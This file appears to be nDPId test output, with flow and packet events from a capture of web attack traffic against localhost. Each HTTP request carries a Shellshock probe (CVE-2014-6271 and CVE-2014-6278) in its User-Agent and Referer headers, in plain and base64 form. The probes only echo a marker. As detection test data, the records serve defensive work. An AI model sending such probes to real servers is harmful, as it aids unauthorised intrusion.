-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1576420277442,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277442,"pkt":"AAAAAAAAAAAAAAAACABFAAEICV1AAEAGMpF\/AAABfwAAAcVYH5Aa\/jGM\/2VZ0IAYAED+\/AAAAQEICp1m\/eqdZv3pR0VUIC9ydWJ5LnJiIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ruby.rb","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00762{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1576420277443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277443,"pkt":"AAAAAAAAAAAAAAAACABFAAEH1YJAAEAGZmx\/AAABfwAAAcVaH5CqXO1RjdaXCYAYAED++wAAAQEICp1m\/eudZv3rR0VUIC9zZWFyY2ggSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1576420277444,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277444,"pkt":"AAAAAAAAAAAAAAAACABFAAELsxNAAEAGiNd\/AAABfwAAAcVcH5B0n4vBZle5N4AYAED+\/wAAAQEICp1m\/eydZv3sR0VUIC9zZWFyY2guY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1576420277446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277446,"pkt":"AAAAAAAAAAAAAAAACABFAAELQstAAEAG+R9\/AAABfwAAAcVeH5AckXoZTNNhQ4AYAED+\/wAAAQEICp1m\/e6dZv3uR0VUIC9zZXJ2ZXIucGhwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/server.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1576420277448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277448,"pkt":"AAAAAAAAAAAAAAAACABFAAEHr2pAAEAGjIR\/AAABfwAAAcVgH5ABL5e76\/gzuYAYAED++wAAAQEICp1m\/fCdZv3wR0VUIC9zdGF0dXMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7440000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/status","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1576420277449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277449,"pkt":"AAAAAAAAAAAAAAAACABFAAELeuBAAEAGwQp\/AAABfwAAAcViH5Bf0UINj\/XlzYAYAED+\/wAAAQEICp1m\/fGdZv3xR0VUIC9zeXNpbmZvLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sysinfo.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1576420277451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277451,"pkt":"AAAAAAAAAAAAAAAACABFAAEFPsFAAEAG\/S9\/AAABfwAAAcVkH5CmDwZuBlGlyYAYAED++QAAAQEICp1m\/fOdZv3zR0VUIC90ZXN0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1576420277452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277452,"pkt":"AAAAAAAAAAAAAAAACABFAAEJ+UlAAEAGQqN\/AAABfwAAAcVmH5C1jMGV60p+W4AYAED+\/QAAAQEICp1m\/fSdZv30R0VUIC90ZXN0LWNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_packet_id":1,"flow_last_seen":1576420277454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277454,"pkt":"AAAAAAAAAAAAAAAACABFAAEJpZBAAEAGllx\/AAABfwAAAcVoH5CGpZ1eF0nj7YAYAED+\/QAAAQEICp1m\/fadZv32R0VUIC90ZXN0LmNnaSBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":487,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277454,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_packet_id":1,"flow_last_seen":1576420277455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277455,"pkt":"AAAAAAAAAAAAAAAACABFAAENkNNAAEAGqxV\/AAABfwAAAcVqH5AR5agGdIx514AYAED\/AQAAAQEICp1m\/fedZv33R0VUIC90ZXN0X2NnaS5waHAgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277455,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 